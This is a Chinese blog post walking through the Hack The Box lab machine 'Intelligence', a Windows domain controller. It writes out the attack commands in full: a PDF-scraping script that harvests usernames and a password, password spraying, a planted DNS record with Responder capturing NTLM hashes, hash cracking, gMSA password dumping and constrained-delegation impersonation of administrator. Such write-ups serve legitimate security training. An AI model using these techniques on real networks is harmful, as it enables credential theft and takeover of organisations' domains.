【Hack The Box】windows练习-- Intelligence

最新推荐文章于 2022-12-28 00:55:16 发布
最新推荐文章于 2022-12-28 00:55:16 发布
阅读量662 收藏 1
点赞数
分类专栏: Hack The Box 文章标签: windows microsoft
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65527369/article/details/127837765
版权

HTB 学习笔记

【Hack The Box】windows练习-- Intelligence

🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年9月7日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

在这里插入图片描述

信息收集

53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-08-13 08:43:33Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-08-13T08:44:54+00:00; +7h03m18s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-08-13T08:44:54+00:00; +7h03m18s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-08-13T08:44:54+00:00; +7h03m18s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-08-13T08:44:54+00:00; +7h03m18s from scanner time.
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

53的dns,80的web,88的ker,rpc,smb,ldap,445
464/tcp open kpasswd5?
9389/tcp open mc-nmf
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
(Domain: intelligence.htb0., Site: Default-First-Site-Name)
commonName=dc.intelligence.htb

根据 IIS 版本 ,主机至少为 Windows 10 / Server 2016+。 DNS、Kerberos 和 LDAP 的组合表明这是一个 Windows 域控制器。 此外,对于 Kerberos,如果我设法找到用户名,我可以尝试 ASREP-roasting,如果我找到 creds,我可以尝试 Kerberoasting。

我看smb

smbmap -H 10.10.10.248 
[+] IP: 10.10.10.248:445        Name: 10.10.10.248                                      
smbmap -H 10.10.10.248 -u 0xdf -p 0xdf
[!] Authentication error on 10.10.10.248

smbclient -N -L //10.10.10.248
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available

要不起

我看dns

dig @10.10.10.248 intelligence.htb
dig axfr @10.10.10.248 intelligence.htb
dnsenum --dnsserver 10.129.95.154 -f /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -o scans/dnsenum-bitquark-intelligence.htb intelligence.htb

在这里插入图片描述
dc.intelligence.htb
加入host

我看ldap

ldapsearch -H ldap://10.129.95.154 -x -s base namingcontexts
ldapsearch -H ldap://10.129.95.154 -x -b DC=intelligence,DC=htb
ldapsearch -H ldap://10.129.95.154 -x -b DC=intelligence,DC=htb "(objectClass=person)" |   grep "sAMAccountName:"

啥也没有

我看web80

在这里插入图片描述
contact@intelligence.htb

还有两个文档,我完全看不懂,带着翻译都看不懂
不知所云,狗屁不通
目录爆破也什么都没有
但是鉴于这两个文件可以下载,我准备下载下来分析一下

oxdf@parrot$ exiftool 2020-01-01-upload.pdf
ExifTool Version Number         : 12.16
File Name                       : 2020-01-01-upload.pdf
Directory                       : .
File Size                       : 26 KiB
File Modification Date/Time     : 2021:08:14 20:29:29-04:00
File Access Date/Time           : 2021:08:14 20:29:59-04:00
File Inode Change Date/Time     : 2021:08:14 20:29:50-04:00
File Permissions                : rwxrwx---
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.5
Linearized                      : No
Page Count                      : 1
Creator                         : William.Lee
oxdf@parrot$ exiftool 2020-12-15-upload.pdf 
ExifTool Version Number         : 12.16
File Name                       : 2020-12-15-upload.pdf
Directory                       : .
File Size                       : 27 KiB
File Modification Date/Time     : 2021:08:14 20:33:36-04:00
File Access Date/Time           : 2021:08:14 20:33:36-04:00
File Inode Change Date/Time     : 2021:08:14 20:33:37-04:00
File Permissions                : rwxrwx---
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.5
Linearized                      : No
Page Count                      : 1
Creator                         : Jose.Williams

发现了用户
William.Lee
Jose.Williams
并且把他们放到user文本中

我看88Kerberos

把刚才的那两个用户放进去,同时还要在多放几个版本的
比如LWilliam,wLee这样子的,外国人咋起名字咱也不懂,反正就这几种

./kerbrute_linux_amd64 userenum --dc 10.10.10.248 -d intelligence.htb user

在这里插入图片描述

GetNPUsers.py -no-pass -dc-ip 10.129.95.154 intelligence.htb/Jose.Williams

在这里插入图片描述

pdf

查看网站上 PDF 的文件名,文件名符合模式 YYYY-MM-DD-upload.pdf. 有理由认为网站上可能存在未链接的相同格式的 PDF。 我将编写一个简短的 Python 脚本来查找相同格式的其他 PDF:
这里我卡住了,借用大神的思路以及脚本,真的牛

#!/usr/bin/env python3

import datetime
import requests


t = datetime.datetime(2020, 1, 1)  
end = datetime.datetime(2021, 7, 4) 

while True:
    url = t.strftime("http://intelligence.htb/documents/%Y-%m-%d-upload.pdf")  
    resp = requests.get(url)
    if resp.status_code == 200:
        print(url)
    t = t + datetime.timedelta(days=1)
    if t >= end:
        break

在这里插入图片描述

#!/usr/bin/env python3

import datetime
import io
import PyPDF2
import requests
t = datetime.datetime(2020, 1, 1)
end = datetime.datetime(2021, 7, 4)
keywords = ['user', 'password', 'account', 'intelligence', 'htb', 'login', 'service', 'new']
users = set()
while True:
    url = t.strftime("http://intelligence.htb/documents/%Y-%m-%d-upload.pdf")
    resp = requests.get(url)
    if resp.status_code == 200:
        with io.BytesIO(resp.content) as data:
            pdf = PyPDF2.PdfFileReader(data)
            users.add(pdf.getDocumentInfo()['/Creator'])
            for page in range(pdf.getNumPages()):
                text = pdf.getPage(page).extractText()
                if any([k in text.lower() for k in keywords]):
                    print(f'==={url}===\n{text}')
    t = t + datetime.timedelta(days=1)
    if t >= end:
        break

with open('users', 'w') as f:
    f.write('\n'.join(users))

更改一下,遍历出所有敏感字符,输出到users
在这里插入图片描述发现了密码,同时user也成功输入进了所有user信息

在这里插入图片描述

密码喷洒

ker中所有用户全部存在
接下来试试smb等

crackmapexec smb 10.10.10.248 -u users -p NewIntelligenceCorpUser9876 --continue-on-success

在这里插入图片描述smbmap -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -H 10.129.95.154
在这里插入图片描述
然后登陆进了smb,枚举到了信息

在这里插入图片描述

内网分析

bloodhound-python -c ALL -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -d intelligence.htb -dc intelligence.htb -ns 10.129.95.154

但是啥都没有

smb

smbclient -U Tiffany.Molina //10.129.95.154/IT NewIntelligenceCorpUser9876

我们去it组织再枚举一下,发现了一个ps1脚本
在这里插入图片描述高到本地来查看一下
在这里插入图片描述
该脚本进入 LDAP 并获​​取所有计算机的列表,然后遍历名称以“web”开头的计算机。 它将尝试向该服务器发出 Web 请求(使用正在运行的用户的凭据),如果状态码不是 200,它将通过电子邮件发送给 Ted.Graves 并让他们知道主机已关闭。 顶部的评论说它计划每五分钟运行一次。

https://github.com/dirkjanm/krbrelayx

-u intelligence\\Tiffany.Molina- 认证为的用户;
-p NewIntelligenceCorpUser9876- 用户密码;
--action add- 添加新记录;
--record web-0xdf- 要添加的域;
--data 10.01.14.19- 要添加的数据,在这种情况下,是要解析 web-0xdf 的 IP;
--type A- 要添加的记录类型。

python3 dnstool.py -u intelligence\\Tiffany.Molina -p NewIntelligenceCorpUser9876 --action add --record webrong --data 10.10.14.8 10.129.95.154

本地开启icmp监听
sudo responder -I tun0

在这里插入图片描述

在这里插入图片描述

john --wordlist=/usr/share/wordlists/rockyou.txt ted.graves.hash

在这里插入图片描述
Mr.Teddy (Ted.Graves)

白银票据

在这里插入图片描述
我们分析一下结构,ted用户是it组成员,it组成员对svc用户有ReadGMSAPassword,而后svc用户对dc有组托管

https://github.com/micahvandeusen/gMSADumper

python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb
这将会得到一个hash,我们不必破解他,因为下一步可以直接带着hash执行

在这里插入图片描述

80c1d736d9988b5763b9aa74362db287

下一步我们需要利用AllowedToDelegate

-dc-ip 10.10.10.248
-spn www/dc.intelligence.htb- SPN(见下文)
-hashes :5e47bac787e5e1970cf9acdb5b316239- 我之前收集的 NTLM
-impersonate administrator- 我想要一张票的用户
intelligence.htb/svc_int- 我正在运行的帐户

spn我们可以在对应用户的Allowed To Delegate 中获得
在这里插入图片描述

getST.py -dc-ip 10.129.95.154 -spn www/dc.intelligence.htb -hashes :80c1d736d9988b5763b9aa74362db287 -impersonate administrator intelligence.htb/svc_int

-impersonate administrator- 我想要一张票的用户
在这里插入图片描述sudo ntpdate 10.129.163.131

在这里插入图片描述

export KRB5CCNAME=administrator.ccache
echo "10.129.163.131 dc.intelligence.htb" >> /etc/hosts
klist

python3 /usr/share/doc/python3-impacket/examples/psexec.py -k -no-pass dc.intelligence.htb

在这里插入图片描述在这里插入图片描述

人间体佐菲
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
HTB (hackthebox)Coder Insane靶机 User Flag WriteUp
qq_58869808的博客
04-06 8419
HTB Coder 靶机 UserFlag WriteUp
HackTheBox-Intelligence WP
h1nt的博客
10-19 2917
0x01 端口探测 使用nmap对靶机进行探测: nmap -sV -sC 10.10.10.248 比较标准的DC端口,还多了个WEB的80。 0x02 user.txt 进WEB看看,发现在主页目录可以下载文档。主页能下载的文档文件名为2020-01-01-upload.pdf 遂写了脚本进行爆破,将所有的文档下载下来: import requests for month in range(1, 13): for day in range(1, 32):
Hack The Box——AI
江左盟的博客
02-28 920
目录 简介 信息收集 漏洞发现 漏洞利用 权限提升 总结 简介 这是一个比较有创意、考验脑洞的靶机(可能是我见识少),难度主要集中在漏洞发现部分。我按一般逻辑进行渗透,在发现文件上传点和两个文件(db.php和intelligence.php)之后,尝试绕过上传无果,只好借助强大的Google进行寻找思路了,原来是通过上传的wav音频文件进行SQL注入,然后获取用户名和密码通过SS...
HTB打靶日记:Intelligence
m0_73998094的博客
12-28 769
HTB打靶日记:Intelligence
HTB-oscplike-Fuse+Intelligence
m0_53302733的博客
04-21 3911
HTB-oscplike-Fuse+Intelligence Fuse 除开忙了几天耽误了一段时间 这个月二十多天加上没记录的打了五十多台机器了 htb会员也马上到期了 这两天找几台AD域的打打 回头就打oscp里的机器了 medium难度的fuse 靶机IP 10.10.10.193 sudo nmap -sS -sV -A -p- --min-rate=1000 -Pn 10.10.10.193 53/tcp open domain Simple DNS Plus 80/tcp
hack-browser-data-windows-64bit
最新发布
05-12
这款工具支持多种主流浏览器,如 Chrome、Firefox、Edge、360、QQ、Brave 等,并且可以在 Windows、macOS 和 Linux 系统上运行。 安装和使用:对于 Windows 系统,安装过程非常简单。用户只需下载适用于 Windows 64...
Hack-the-Box-OSCP-Preparation:Hack-the-Box-OSCP-Preparation
03-20
介绍你好呀!如果您不认识我,我叫Rana Khalil,然后按Twitter句柄 。在花了将近八个月的时间,攻读了Offensive Security Certified Professional(OSCP)认证后,我很高兴地宣布我已获得OSCP官方认证!...
Hackthebox e Vulnhub - Dicas e Truques.pdf
10-06
网络安全渗透测试
HackTheBox-Writes-Ups:HackTheBox CTFC挑战写作
03-20
HackTheBox CTF /挑战写作将在这里下载。
HackTheBox靶机系列之困难Reel
04-09
HackTheBox靶机系列之困难Reel 本篇文章主要介绍了Reel靶机的整个利用过程,从侦察到提权,涵盖了渗透测试、漏洞利用、信息收集等多个方面的知识点。 侦察阶段 在Reel靶机中,我们首先进行了侦察,扫描了21、22、...
最详细讲解,保姆式操作,Linux集群下Hadoop的安装、配置、启动以及UI界面访问
悟空非空也
09-13 1081
前言 Hadoop包含2个基本组件:HDFS和Yarn。前者负责存储文件,后者负责管理文件。 HDFS分布式文件系统 HDFS是Hadoop的分布式文件系统,它是Hadoop生态系统中的核心项目之一,是分布式计算中数据存储管理基础。 Yarn资源管理框架 Yarn(Yet Another Resource Negotiator)是Hadoop 2.0中的资源管理器,它可为上层应用提供统一的资源管理和调度。 准备工作 Linux系统和已经安装jdk jdk的安装步骤参考: https://www.bili
Hack The Boxwindows练习-- Sauna
人间体佐菲的博客
11-17 440
Hack The Boxwindows练习-- Sauna
docker desktop ubuntu镜像_基于 Docker 构建 Hadoop 平台
weixin_39774644的博客
11-20 524
基于Docker的Hadoop集群构建0. 绪论使用Docker搭建Hadoop技术平台,包括安装Docker、Java、Scala、Hadoop、 Hbase、Spark。集群共有5台机器,主机名分别为 h01、h02、h03、h04、h05。其中 h01 为 master,其他的为 slave。JDK 1.8Scala 2.11.6Hadoop 3.2.0Hbase 2.1.3Spark 2....
HTB Arctic[ATT&CK模型]writeup系列7
重新启程
02-05 3348
目录 0x00 靶机情况 0x01 ATT&CK ATT&CK能用来干什么? 网空威胁行为体(CyberThreat Actors) ATT&CK模型 TTP的定义 0x02 PRE-ATT&CK 一、Priority Definition(优先级定义) 二、Target Selection(选择目标) 三、Information Gat...
Your port 80 is actually used by : Server: Microsoft-IIS/10.0 Cannot install the Apache service, p
Welcome Back Home!
11-10 4863
Wamp Apache 启动不成功 Wamp Apache 检测 80端口 提示 Your port 80 is actually used by Server: Microsoft-IIS/XX(某版本)解决方法 打开 “程序和功能—》启用或关闭windows功能–》Internet Information Services–》Web管理工具” 关掉里面所有关于IIS的选项!重启然后
windows10 下安装 wampserver 80端口被Microsoft-IIS/10.0占用解决办法!
zlq_CSDN的博客
04-15 2416
之前不知道什么错误操作导致 WampServer 不能够正常启用(显示着橙色),看了很多博客文章,提到将之前的WampServer删除掉,然后重新安装到C盘下,但是依旧没能够解决了我的问题。 其中有的提到这样解决: 解决方案 :计算机->右键管理->服务和应用程序->服务->SQL Server Reporting Services->右键停止 问题:可是在我的服务...
hackthebox-secnotes (IIS-php )
冬萍子癸水
02-12 309
1、扫描 445开了说明可能有smb登录,8808有http C:\root> masscan -p1-65535,U:1-65535 10.10.10.97 --rate=1000 -e tun0 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2021-02-12 01:45:25 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN
Wampser无法启动Apache,Your port 80 actually used by:Microsoft-IIS/10.0 Cannot install the Apache service
xiangfengl的专栏
08-22 1693
Wamp Apache 启动不成功 Wamp Apache 检测 80端口 提示Your port 80 actually used by:Microsoft-IIS/10.0 Cannot install the Apache service 解决方法: 一、打开控制面板--添加/删除,“程序和功能—》启用或关闭windows功能–》Internet Information Services–》Web管理工具” 关掉里面所有关于IIS的选项! 二、重启电脑,按 Win+...
网络扫描与网络侦察一
young的博客
11-01 2132
网络扫描与网络侦察 文章目录网络扫描与网络侦察前言一、网络扫描与网络侦察的目的二、常用工具1.Google Hacking(或baidu)2.BASE64编码3.Nmap4.WinHex三、被动扫描,利用搜索引擎或相关网站1. 麻省理工学院网站中文件名包含“network security”的pdf文档2.照片中的女生在哪里旅行?3、手机位置定位。4、编码解码5、地址信息四、NMAP使用1、利用NMAP扫描Metasploitable2(需下载虚拟机镜像)的端口开放情况。2、利用NMAP扫描Metas
hackthebox - reel
11-03
HackTheBox - Reel是一个在黑客社区非常受欢迎的虚拟机靶场。这个靶场的目标是通过渗透测试和攻击手法,找到并获得系统的管理员权限。靶场基于漏洞存在和网络安全问题,提供了一个真实的环境来练习和提升安全技能。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值